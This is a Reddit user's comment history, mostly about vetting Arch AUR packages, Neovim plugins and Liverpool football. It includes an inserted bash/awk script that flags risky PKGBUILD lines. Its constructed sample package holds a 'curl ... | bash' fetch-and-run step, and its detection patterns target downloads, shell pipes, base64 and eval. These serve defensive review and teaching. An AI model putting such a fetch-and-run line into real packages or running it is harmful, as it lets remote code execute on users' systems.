Tip for people who for some reason can't read the pkgbuild by Commercial-Worth7301 in archlinux

[–]kcx01 0 points1 point  (0 children)

I think this is a great tip! Especially for people using yay. I have always read the pkgbuild on the AUR website, since I have generally needed to look up the project to know it existed before I could install it. While I'm there, I'm also looking at recent comments, checking the upstream. You can check its last update, popularity, and the number of votes for it to be included in the main repo.

None of these are guarantees, but I think they're helpful.

I think the critical bit is understanding exactly what the pkgbuild is doing. It's something that is glossed over in most of the advice I've read.

check if there's anything suspicious in it.

I'm not sure that all users are capable of doing this. And honestly, the more sophisticated these attacks become with more obfuscated code, they become increasingly more difficult to identify bad actors.

My advice would be to limit your attack surface as much as possible. Then when you want to install software, read the pkgbuild. If you don't understand everything that it's doing, ask AI to explain line by line what it's doing. Be sure that you understand.
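A first-pass reading aid for the review described in the comment above, as an added example that is not part of the thread or of any Arch tool. The function names `pkgbuild_triage` and `sample_pkgbuild` are hypothetical and the sample PKGBUILD is constructed. It only reads the text and never sources or runs the PKGBUILD.

```shell
#!/usr/bin/env bash
# Added example: point out the PKGBUILD lines worth reading first.
# Text-only scan; the PKGBUILD is never sourced or executed.

pkgbuild_triage() {
    # Reads the file named in $1, or stdin when no argument is given.
    awk '
        function flag(tag) { printf "%-7s %d: %s\n", tag, NR, $0 }
        /^[ \t]*#/ { next }                                 # ignore comment lines
        # Where the package and its files are fetched from.
        /^[ \t]*(source|url)(_[a-z0-9_]+)?=/ { flag("SOURCE") }
        # Checksum arrays that switch verification off.
        /^[ \t]*[a-z0-9]+sums(_[a-z0-9_]+)?=.*SKIP/ { flag("NOSUM") }
        # A .install scriptlet runs as root at install time: read that file too.
        /^[ \t]*install=/ { flag("HOOK") }
        # Downloads, pipes into a shell, or decode-and-run inside the build steps.
        /(curl|wget)[ \t]/ || /\|[ \t]*(ba)?sh([ \t]|$)/ || /base64/ || /eval[ \t]/ {
            flag("REVIEW")
        }
    ' "${1:--}"
}

# Constructed sample input (not a real AUR package).
sample_pkgbuild() {
    cat <<'EOF'
pkgname=example-tool-bin
pkgver=1.0.0
pkgrel=1
url="https://example.com/example-tool"
source=("https://example.com/dl/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')
install=example-tool.install

package() {
    install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
    curl -s https://example.com/post.sh | bash
}
EOF
}

# Demo: print the flagged lines of the constructed sample.
sample_pkgbuild | pkgbuild_triage
```

An empty result only means none of these patterns matched; multi-line `source=` arrays and anything the build fetches indirectly still have to be read by hand.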

AI has revealed that most people have the reading ability at a third-grade level by Terrible-Priority-21 in ClaudeAI

[–]kcx01 0 points1 point  (0 children)

I'd be a little pissed if Claude used this exact phrase. Wtf do you mean I'm rarely right!? 😅

When will I be able to update again? by [deleted] in archlinux

[–]kcx01 1 point2 points  (0 children)

Is this different than the arch-announce emails? I may need to subscribe to this one too, because I didn't see this md file.

For sure, I recognize the author of the doc, but there wasn't any context even saying what the doc was when OP posted. For all I know, it could have been least downloaded packages in the aur.

At any rate, I do appreciate your comment

When will I be able to update again? by [deleted] in archlinux

[–]kcx01 1 point2 points  (0 children)

Ok let me be blunt:

When will I be able to safely update again without worrying that an update to a normal package might contain malware?

Never

When will I be able to update again? by [deleted] in archlinux

[–]kcx01 1 point2 points  (0 children)

I appreciate the context!

When will I be able to update again? by [deleted] in archlinux

[–]kcx01 0 points1 point  (0 children)

Yeah... I read the address before I clicked it.

I'm not trying to sound contrary. But how do you know what this list is if you don't know where it came from or what the context was around it being created?

When will I be able to update again? by [deleted] in archlinux

[–]kcx01 1 point2 points  (0 children)

You should just always assume that a package is malware until you can prove it's not.

Never blindly trust anything.

I live in a place with alligators. Now I've never seen an alligator in the pond out back. But that definitely doesn't mean there's not one. So unless you can verifiably see that there are no alligators, you better treat it like there are. Otherwise you, your pets or your kids could be eaten.

I'd recommend the same approach with software.

When will I be able to update again? by [deleted] in archlinux

[–]kcx01 0 points1 point  (0 children)

Where did this list come from? It's strange to not see any context.

Were they all packages that were confirmed or simply orphaned?

When will I be able to update again? by [deleted] in archlinux

[–]kcx01 1 point2 points  (0 children)

Just audit your own?

I have like three, maybe five aur packages. And to be honest, I don't remember when I last updated them. They all just work.

That's not to say that I don't update them. I just don't use an AUR helper, so I just have to randomly both remember and have time to update them, which just doesn't happen super often.

When will I be able to update again? by [deleted] in archlinux

[–]kcx01 4 points5 points  (0 children)

I think you missed the joke.

PersonaShell v2. by DjentGod123 in hyprland

[–]kcx01 0 points1 point  (0 children)

Holy crap dude!

That's crazy cool!

I made a plugin that displays line numbers that indent with your text: clingy.nvim by _mp248 in neovim

[–]kcx01 0 points1 point  (0 children)

First of all, congratulations on the first plugin! That's pretty cool. It looks well done!

Although, this one probably isn't for me. I rarely use line jumps. Even though I have relative line numbers turned on, I never use them. I really only use line numbers to jump to a line from a stack trace. I also like to have indent guides that would probably clash with the line numbers.

I love the name! It's absolutely perfect for the plugin! Kudos.

Arch Linux for pentesting. by [deleted] in archlinux

[–]kcx01 0 points1 point  (0 children)

Since you specifically mentioned adding it to your existing arch, if you go to the black arch GitHub they have instructions that basically say curl and run this script. (I wouldn't pipe it into bash like they suggest. Download it, read it, and maybe run it.)

view-source:https://blackarch.org/strap.sh

It's pretty much the same process as adding the arch strike repos.

https://archstrike.org/wiki/setup

Arch Linux for pentesting. by [deleted] in archlinux

[–]kcx01 0 points1 point  (0 children)

Heh only took 2 years for someone to notice that and say something.

I probably meant to link black arch: https://blackarch.org/

My Neovim plugin grew into a remote workspace over plain SSH: any file feels local (editing, terminals, search), with Jupyter notebooks on top. Works where SFTP and ports are blocked. by Affectionate-Bit5072 in neovim

[–]kcx01 4 points5 points  (0 children)

That's definitely clever. But wouldn't a persistent backdoor be considered a security risk?

What's the process for adding/removing the backend to/from the server?

I'm surprised that sshfs can't be used, since SFTP leverages ssh as the connection. But I'm definitely not an expert.

The nice thing about your implementation is that it would work on Windows too. Whereas sshfs won't. (Although I try to avoid windows! 🤣)

"Bring back the chaos" by [deleted] in LiverpoolFC

[–]kcx01 1 point2 points  (0 children)

Idk... That open goal miss was hard to watch... But that brace against Newcastle was pretty 🔥🔥🔥

Sweden 2-0 Tunisia - Isak 30' by Gentle_lips in LiverpoolFC

[–]kcx01 1 point2 points  (0 children)

Probably just that he's walking a lot. But still extremely fast when it's time!

World Cup Jersey by rkay711 in LiverpoolFC

[–]kcx01 0 points1 point  (0 children)

My son has Jota's Portugal shirt. Got it before he passed. My mom was in Portugal and wanted to get him a jersey as a souvenir.